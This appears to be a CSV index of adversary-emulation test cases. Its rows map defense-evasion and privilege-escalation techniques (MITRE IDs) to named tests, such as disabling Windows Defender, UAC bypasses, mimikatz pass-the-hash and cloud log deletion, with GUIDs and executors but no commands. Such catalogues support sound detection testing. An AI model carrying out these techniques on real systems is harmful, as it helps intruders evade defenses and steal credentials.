defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,32,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,4,AWS - Disable CloudTrail Logging Through Event Selectors using Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,5,AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus,22d89a2f-d475-4895-b2d4-68626d49c029,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC Flow Logs using Stratus,93c150f5-ad7b-4ee3-8992-df06dec2ac79,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS - CloudWatch Log Stream Deletes,89422c87-b57b-4a04-a12a-802bb11d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
privilege-escalation,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
